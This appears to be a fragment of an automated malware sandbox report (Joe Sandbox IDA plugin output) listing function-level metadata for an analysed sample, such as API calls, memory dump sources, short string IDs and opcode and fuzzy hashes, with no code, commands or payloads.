                                            • Instruction Fuzzy Hash: 3D0149B1F00218DFC720FF69FC41A6D73A0EB09200FA002A9E4195B350D77469958747
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF787E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 1385522511-3597986494
                                            • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction ID: 76dc0a24593a9faf94cc8e6e1f45bdd86553922fdc90086fcffab0b60fb40bde
                                            • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction Fuzzy Hash: 0A01F970F042549BC720EFB8AD41F6D7362AB18315FA00279D71557290EB78B541DB99
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF72BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 1385522511-3597986494
                                            • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction ID: 92b4dbfa11e40cbbe3f15e7114ff5953559e4fc7f519d1489ac64957b9161d3b
                                            • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction Fuzzy Hash: 7201F9B1F01248DFCB20EFA8AD41F7D7362AB19314FA00169EA195B290E7387541CB56
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040847E
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                            • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407EBE
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
                                            • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B37AD0
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$EDO*
                                            • API String ID: 4132704954-3480089779
                                            • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction ID: fa8db8f361f1a550fdfca031d8093479c25c73c370b8a0e8d0597c2eca6c5bf3
                                            • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction Fuzzy Hash: 2A01F4B0F04208DBDB20DFAAE841E4CB7B0EB14705F9045BAC801973A0CA34BA07CF49
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B37BE0
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$^]E*
                                            • API String ID: 4132704954-2708296792
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF6C69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: DCDO$EDO*
                                            • API String ID: 1385522511-3480089779
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF6D79
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: DCDO$^]E*
                                            • API String ID: 1385522511-2708296792
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407869
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$EDO*
                                            • API String ID: 2296764815-3480089779
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407979
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$^]E*
                                            • API String ID: 2296764815-2708296792
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: 8&
                                            • API String ID: 3253501508-2786664035
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: 8&
                                            • API String ID: 3253501508-2786664035
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: 8&
                                            • API String ID: 3253501508-2786664035